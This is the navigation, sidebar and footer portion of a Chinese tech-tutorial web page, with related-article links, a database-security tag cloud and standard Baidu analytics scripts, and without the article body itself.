href="https://www.qianjiagd.com/s-access数据库的作用">access数据库的作用</a> <a target="_blank" href="https://www.qianjiagd.com/s-日语作文网络安全">日语作文网络安全</a> <a target="_blank" href="https://www.qianjiagd.com/s-电脑与服务器中断连接">电脑与服务器中断连接</a> </div> <div class="share"><img src="https://www.qianjiagd.com/static/zsymb/images/wxgzh.jpg"> <div class="share-text"> <p>扫描关注千家信息网微信公众号,第一时间获取内容更新动态</p> <p>转载请说明来源于"千家信息网"</p> <p>本文地址:<a href="https://www.qianjiagd.com/a34595" target="_blank">https://www.qianjiagd.com/a34595</a></p> </div> </div> <div class="clear"></div> <div class="info-pre-next"> <ul> <li><a href="https://www.qianjiagd.com/a34592"><i><em>上一篇</em><img src="https://www.qianjiagd.com/static/assets/images/nopic.gif"></i> <h2>PHP如何实现缓存技术</h2> <p>这篇文章给大家分享的是有关PHP如何实现缓存技术的内容。小编觉得挺实用的,因此分享给大家做个参考,一起跟随小编过来看看吧。PHP,一门最近几年兴起的Web设计脚本语言,由于它的强大和可伸缩性,近几年来</p> </a></li> <li><a href="https://www.qianjiagd.com/a34599"><i><em>下一篇</em><img src="https://www.qianjiagd.com/static/assets/images/nopic.gif"></i> <h2>Numpy中如何将二维图像矩阵转换为一维向量</h2> <p>本篇内容主要讲解"Numpy中如何将二维图像矩阵转换为一维向量",感兴趣的朋友不妨来看看。本文介绍的方法操作简单快捷,实用性强。下面就让小编来带大家学习"Numpy中如何将二维图像矩阵转换为一维向量"</p> </a></li> </ul> </div> </div> </div> <div class="clear blank"></div> <div class="otherlink whitebg"> <div class="news-title"> <h2>相关文章</h2> </div> <ul> <li><a href="https://www.qianjiagd.com/a177928" title="PHP中session会话操作技巧有哪些">PHP中session会话操作技巧有哪些</a></li> <li><a href="https://www.qianjiagd.com/a146158" title="PHP类相关知识点有哪些">PHP类相关知识点有哪些</a></li> <li><a href="https://www.qianjiagd.com/a123341" title="VS2008无法直接查看STL值怎么办">VS2008无法直接查看STL值怎么办</a></li> <li><a href="https://www.qianjiagd.com/a245815" title="php版微信公众平台之微信网页登陆授权的示例分析">php版微信公众平台之微信网页登陆授权的示例分析</a></li> <li><a href="https://www.qianjiagd.com/a201934" title="中高级PHP程序员应该掌握什么技术">中高级PHP程序员应该掌握什么技术</a></li> <li><a href="https://www.qianjiagd.com/a63118" title="CI框架出现mysql数据库连接资源无法释放怎么办">CI框架出现mysql数据库连接资源无法释放怎么办</a></li> <li><a href="https://www.qianjiagd.com/a37602" title="ajax跨域访问报错501怎么办">ajax跨域访问报错501怎么办</a></li> <li><a href="https://www.qianjiagd.com/a106909" title="什么是RPC框架">什么是RPC框架</a></li> <li><a href="https://www.qianjiagd.com/a157266" title=".net mvc超过了最大请求长度怎么办">.net mvc超过了最大请求长度怎么办</a></li> <li><a href="https://www.qianjiagd.com/a213044" title="php分页原理的示例分析">php分页原理的示例分析</a></li> <!-- <li><a target="_blank" href="/">制作是这么收费的?</a></li> --> </ul> </div> </div> <!-- . end of left-box --> <!-- right aside start--> <aside class="side-section right-box"> <div class="side-tab"> <ul id="sidetab"> <li class="sidetab-current">站长推荐</li> <li>点击排行</li> </ul> <div id="sidetab-content"> <section> <div class="tuijian"> <section class="topnews imgscale"><a href="https://www.qianjiagd.com/a622964" title="recovery是什么意思?电脑开机重启显示recovery蓝屏怎么办"><img src="https://www.qianjiagd.com/uploadfile/thumb/a87ff679a2f3e71d9181a67b7542122c/278x185_auto.jpg" alt="recovery是什么意思?电脑开机重启显示recovery蓝屏怎么办"><span>recovery是什么意思?电脑开机重启显示recovery蓝屏怎么办</span></a></section> <ul> <li><a href="https://www.qianjiagd.com/a67182" title="怎么在Linux中配置SSH和Xshell远程连接服务器"><i><img src="https://www.qianjiagd.com/uploadfile/thumb/9a/65e9dcdf.jpg" alt="怎么在Linux中配置SSH和Xshell远程连接服务器"></i> <p>怎么在Linux中配置SSH和Xshell远程连接服务器</p> </a></li> <li><a href="https://www.qianjiagd.com/a123341" title="VS2008无法直接查看STL值怎么办"><i><img src="https://www.qianjiagd.com/uploadfile/thumb/52/bf79ba42.jpg" alt="VS2008无法直接查看STL值怎么办"></i> <p>VS2008无法直接查看STL值怎么办</p> </a></li> <li><a href="https://www.qianjiagd.com/a106909" title="什么是RPC框架"><i><img src="https://www.qianjiagd.com/uploadfile/thumb/10/d0f5142a.jpg" alt="什么是RPC框架"></i> <p>什么是RPC框架</p> </a></li> <li><a href="https://www.qianjiagd.com/a157266" title=".net mvc超过了最大请求长度怎么办"><i><img src="https://www.qianjiagd.com/uploadfile/thumb/36/6d16d7e5.jpg" alt=".net mvc超过了最大请求长度怎么办"></i> <p>.net mvc超过了最大请求长度怎么办</p> </a></li> </ul> <section class="topnews imgscale"><a href="https://www.qianjiagd.com/a244736" title="java怎么实现try/catch异常块"><img src="https://www.qianjiagd.com/uploadfile/thumb/15/9878a9c6.jpg" alt="java怎么实现try/catch异常块"><span>java怎么实现try/catch异常块</span></a></section> <ul> <li><a href="https://www.qianjiagd.com/a199222" title="PHP中如何处理上传文件"><i><img src="https://www.qianjiagd.com/uploadfile/thumb/ee/203d504b.jpg" alt="PHP中如何处理上传文件"></i> <p>PHP中如何处理上传文件</p> </a></li> <li><a href="https://www.qianjiagd.com/a184615" title="php中require_once报错的解决方法"><i><img src="https://www.qianjiagd.com/uploadfile/thumb/ef/e0177085.jpg" alt="php中require_once报错的解决方法"></i> <p>php中require_once报错的解决方法</p> </a></li> <li><a href="https://www.qianjiagd.com/a192541" title="PHP如何编写学校网站上新生注册登陆程序"><i><img src="https://www.qianjiagd.com/uploadfile/thumb/a1/0898126a.jpg" alt="PHP如何编写学校网站上新生注册登陆程序"></i> <p>PHP如何编写学校网站上新生注册登陆程序</p> </a></li> <li><a href="https://www.qianjiagd.com/a210747" title="php中微信公众号开发模式的示例分析"><i><img src="https://www.qianjiagd.com/uploadfile/thumb/af/9e9aba9a.jpg" alt="php中微信公众号开发模式的示例分析"></i> <p>php中微信公众号开发模式的示例分析</p> </a></li> </ul> </div> </section> <section> <div class="paihang"> <section class="topnews imgscale"><a href="https://www.qianjiagd.com/a21343" title="在vmware esxi6.5中将硬盘驱动类型由HDD变为SSD类型"><img src="https://www.qianjiagd.com/uploadfile/thumb/ab/08b16e75.jpg" alt="在vmware esxi6.5中将硬盘驱动类型由HDD变为SSD类型"><span>在vmware esxi6.5中将硬盘驱动类型由HDD变为SSD类型</span></a></section> <ul> <li><i></i><a href="https://www.qianjiagd.com/a175843" title="Vue中的匿名插槽与具名插槽是什么">Vue中的匿名插槽与具名插槽是什么</a></li> <li><i></i><a href="https://www.qianjiagd.com/a114973" title="vue3与vue2的区别以及vue3的API用法介绍">vue3与vue2的区别以及vue3的API用法介绍</a></li> <li><i></i><a href="https://www.qianjiagd.com/a27254" title="录制的横屏视频怎么变成全屏竖屏(录制的横屏怎么变竖屏)">录制的横屏视频怎么变成全屏竖屏(录制的横屏怎么变竖屏)</a></li> <li><i></i><a href="https://www.qianjiagd.com/a69563" title="qq群作业里为什么图片上传不了(qq群作业照片传不上去)">qq群作业里为什么图片上传不了(qq群作业照片传不上去)</a></li> <li><i></i><a href="https://www.qianjiagd.com/a71754" title="vscoder如何关闭错误提示">vscoder如何关闭错误提示</a></li> <li><i></i><a href="https://www.qianjiagd.com/a36693" title="百度网盘PDF怎么转换成Word格式 PDF转Word操作教程">百度网盘PDF怎么转换成Word格式 PDF转Word操作教程</a></li> <li><i></i><a href="https://www.qianjiagd.com/a15469" title="老年机号码拉黑怎么解除(老年机号码拉黑怎么解除)">老年机号码拉黑怎么解除(老年机号码拉黑怎么解除)</a></li> <li><i></i><a href="https://www.qianjiagd.com/a85246" title="京东以旧换新评估价和实际一样吗(京东以旧换新估价和成交价一样吗)">京东以旧换新评估价和实际一样吗(京东以旧换新估价和成交价一样吗)</a></li> </ul> <section class="topnews imgscale"><a href="https://www.qianjiagd.com/a13935" title="拼多多注销后可以重开新用户吗(拼多多注销后重开算新用户吗)"><img src="https://www.qianjiagd.com/uploadfile/thumb/0a/8e8c068e.jpg" alt="拼多多注销后可以重开新用户吗(拼多多注销后重开算新用户吗)"><span>拼多多注销后可以重开新用户吗(拼多多注销后重开算新用户吗)</span></a></section> </div> </section> </div> </div> <div class="whitebg cloud"> <h2 class="side-title">标签云</h2> <ul> <a target="_blank" href="https://www.qianjiagd.com/tag-2377745.html">数据库的安全要保护哪些东西</a> <a target="_blank" href="https://www.qianjiagd.com/tag-2375887.html">数据库安全各自的含义是什么</a> <a target="_blank" href="https://www.qianjiagd.com/tag-2377880.html">生产安全数据库录入</a> <a target="_blank" href="https://www.qianjiagd.com/tag-2377879.html">数据库的安全性及管理</a> <a target="_blank" href="https://www.qianjiagd.com/tag-2377878.html">数据库安全策略包含哪些</a> <a target="_blank" href="https://www.qianjiagd.com/tag-2377877.html">海淀数据库安全审计系统</a> <a target="_blank" href="https://www.qianjiagd.com/tag-2377876.html">建立农村房屋安全信息数据库</a> <a target="_blank" href="https://www.qianjiagd.com/tag-2377875.html">易用的数据库客户端支持安全管理</a> <a target="_blank" href="https://www.qianjiagd.com/tag-2377874.html">连接数据库失败ssl安全错误</a> <a target="_blank" href="https://www.qianjiagd.com/tag-2377873.html">数据库的锁怎样保障安全</a> <a target="_blank" href="https://www.qianjiagd.com/tag-2377872.html">数据库安全章节测试</a> <a target="_blank" href="https://www.qianjiagd.com/tag-2377871.html">华大基因数据库安全性</a> <a target="_blank" href="https://www.qianjiagd.com/tag-2377870.html">数据库es安全性测试工具</a> <a target="_blank" href="https://www.qianjiagd.com/tag-2377869.html">数据库与云安全</a> <a target="_blank" href="https://www.qianjiagd.com/tag-2377868.html">微生物安全数据库</a> <a target="_blank" href="https://www.qianjiagd.com/tag-2377867.html">数据库个人信息安全吗</a> <a target="_blank" href="https://www.qianjiagd.com/tag-2377866.html">安全数据库降级</a> <a target="_blank" href="https://www.qianjiagd.com/tag-2377865.html">黑龙江数据库安全防护系统</a> <a target="_blank" href="https://www.qianjiagd.com/tag-2377864.html">数据库安全性实验例题</a> <a target="_blank" href="https://www.qianjiagd.com/tag-2377863.html">在国家公共安全数据库有记录</a> </ul> </div> <div class="clear blank"></div> <div class="whitebg suiji"> <h2 class="side-title">猜你喜欢</h2> <ul> <li><a href="https://www.qianjiagd.com/a29879" title="微信登录加载联系人失败怎么弄(微信加载联系人失败 点击重试)">微信登录加载联系人失败怎么弄(微信加载联系人失败 点击重试)</a></li> <li><a href="https://www.qianjiagd.com/a63090" title="华为手机按键震动在哪设置关掉 按键振动怎么取消方法">华为手机按键震动在哪设置关掉 按键振动怎么取消方法</a></li> <li><a href="https://www.qianjiagd.com/a73496" title="陌陌无限注册教程(怎么注册陌陌新号)">陌陌无限注册教程(怎么注册陌陌新号)</a></li> <li><a href="https://www.qianjiagd.com/a71928" title="微信看不到朋友圈不显示一条横线(微信看不到朋友圈只有一条横线)">微信看不到朋友圈不显示一条横线(微信看不到朋友圈只有一条横线)</a></li> <li><a href="https://www.qianjiagd.com/a206293" title="win10开机蓝屏终止代码SYSTEM_SERVICE_EXCEPTION的解决方法">win10开机蓝屏终止代码SYSTEM_SERVICE_EXCEPTION的解决方法</a></li> <li><a href="https://www.qianjiagd.com/a123341" title="VS2008无法直接查看STL值怎么办">VS2008无法直接查看STL值怎么办</a></li> <li><a href="https://www.qianjiagd.com/a173126" title="快影怎么把视频弄成横屏播放 制作方法分享">快影怎么把视频弄成横屏播放 制作方法分享</a></li> <li><a href="https://www.qianjiagd.com/a156265" title="支付宝双v会员的利弊(支付宝双v会员的利弊)">支付宝双v会员的利弊(支付宝双v会员的利弊)</a></li> <li><a href="https://www.qianjiagd.com/a22324" title="拼多多的多多支付怎么解绑银行卡(拼多多的多多支付怎么解绑银行卡)">拼多多的多多支付怎么解绑银行卡(拼多多的多多支付怎么解绑银行卡)</a></li> <li><a href="https://www.qianjiagd.com/a99782" title="怎么将苹果手机中录音发给好友 iPhone传语音文件方法教程">怎么将苹果手机中录音发给好友 iPhone传语音文件方法教程</a></li> </ul> </div> </aside> <!-- right aside end--> </article> <div class="clear blank"></div> <!--footer start--> <footer> <div class="footer box"> <div class="wxbox"> <ul> <li><img src="https://www.qianjiagd.com/static/zsymb/images/wxgzh.jpg"><span>微信公众号</span></li> <li><img src="https://www.qianjiagd.com/static/zsymb/images/wx.png"><span>我的微信</span></li> </ul> </div> <div class="endnav"> <p><b>站点声明:</b></p> <p>所有文章未经授权禁止转载、摘编、复制或建立镜像,如有违反,追究法律责任。</p> <p>Copyright © 2009-2025 <a href="https://www.qianjiagd.com/" target="_blank">千家信息网</a> All Rights Reserved. <a href="/sitemap.xml">网站地图</a> <a href="/about/">关于我们</a> <a href="/contact-us/">联系我们</a> </p> </div> </div> </footer> <a href="#" title="返回顶部" class="icon-top"></a> <!--footer end--> <div style="display:none"> <script> var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?aec778eae8071ef8921721735a4a9509"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); </script> <script> (function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s); })(); </script> </div> <div style="display:none"> <span class="dr_show_hits_34595">0</span><script type="text/javascript"> $.ajax({ type: "GET", url:"/index.php?s=api&c=module&siteid=1&app=article&m=hits&id=34595", dataType: "jsonp", success: function(data){ if (data.code) { $(".dr_show_hits_34595").html(data.msg); } else { dr_tips(0, data.msg); } } }); </script></div> <!--本页面URL https://www.qianjiagd.com/a34595 --> <!--本页面于2025-11-17 22:35:00更新--> </body> </html>